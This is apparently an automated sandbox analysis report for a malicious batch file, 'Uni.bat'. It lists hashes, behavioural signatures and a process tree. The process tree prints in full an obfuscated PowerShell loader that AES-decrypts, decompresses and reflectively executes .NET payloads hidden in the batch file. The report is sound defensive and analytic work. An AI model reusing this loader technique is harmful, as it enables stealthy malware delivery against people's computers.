Analysis
- max time kernel: 121s
- max time network: 122s
- platform: windows7_x64
- resource: win7-20240611-en
- resource tags: arch:x64, arch:x86, image:win7-20240611-en, locale:en-us, os:windows7-x64, system
- submitted: 01-07-2024 16:35
- Static task: static1
- Behavioral task: behavioral1 (sample Uni.bat, resource win7-20240611-en / windows7-x64, 4 signatures, 150 seconds)
General
- Target: Uni.bat
- Size: 586KB
- MD5: 3a43120a8dd1e42ff894670710bd8bc4
- SHA1: dbb9244231da204517f5d7a0e5ca713b64a3c175
- SHA256: b3db27588a80527cb09b85476ed59ce698dc9a4b6b03246160de944ecc5ca79d
- SHA512: 15931135fd1fec93a3d77e0f28a19ca0780e7de34ab6a4f8174999cf534b4f810ace2bba0db3f2d0d0007199771b16d0c2bc3cdee48ef00a19be4705d3c26026
- SSDEEP: 12288:qAtzNGPPmXaudwDKHYeRfRJUnYNY+yjOc3zRMh0KYQgrR3dih:3BsXvudwG4eR5yN6c3VS0KZ9
- Score: 8/10
Malware Config
Signatures
- Command and Scripting Interpreter: PowerShell (1 TTP, 1 IoC)
  Run PowerShell and hide display window.
  pid: 1892, Process: powershell.exe
- Suspicious behavior: EnumeratesProcesses (1 IoC)
  pid: 1892, Process: powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  description: Token: SeDebugPrivilege, pid: 1892, Process: powershell.exe
- Suspicious use of WriteProcessMemory (6 IoCs)
  description                       pid   Process   procid_target
  PID 352 wrote to memory of 380    352   cmd.exe   29
  PID 352 wrote to memory of 380    352   cmd.exe   29
  PID 352 wrote to memory of 380    352   cmd.exe   29
  PID 352 wrote to memory of 1892   352   cmd.exe   30
  PID 352 wrote to memory of 1892   352   cmd.exe   30
  PID 352 wrote to memory of 1892   352   cmd.exe   30
Processes
- C:\Windows\system32\cmd.exe (depth 1, PID 352)
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\system32\cmd.exe (depth 2, PID 380)
    Command line: C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OYi6jovj9grd+OhQ3Yq9CKyYEolqR3DCnwhMoiMIiic='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x758XCMTdc4jhHfAjXEAbQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $PTonT=New-Object System.IO.MemoryStream(,$param_var); $pteGk=New-Object System.IO.MemoryStream; $QeYIq=New-Object System.IO.Compression.GZipStream($PTonT, [IO.Compression.CompressionMode]::Decompress); $QeYIq.CopyTo($pteGk); $QeYIq.Dispose(); $PTonT.Dispose(); $pteGk.Dispose(); $pteGk.ToArray();}function execute_function($param_var,$param2_var){ $imxQj=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $oCBDZ=$imxQj.EntryPoint; $oCBDZ.Invoke($null, $param2_var);}$bxwFd = 'C:\Users\Admin\AppData\Local\Temp\Uni.bat';$host.UI.RawUI.WindowTitle = $bxwFd;$spiDd=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($bxwFd).Split([Environment]::NewLine);foreach ($urTOm in $spiDd) { if ($urTOm.StartsWith('VUGwKkMvYCOpuHkPGxtm')) { $jdwUC=$urTOm.Substring(20); break; }}$payloads_var=[string[]]$jdwUC.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 2, PID 1892)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    Signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken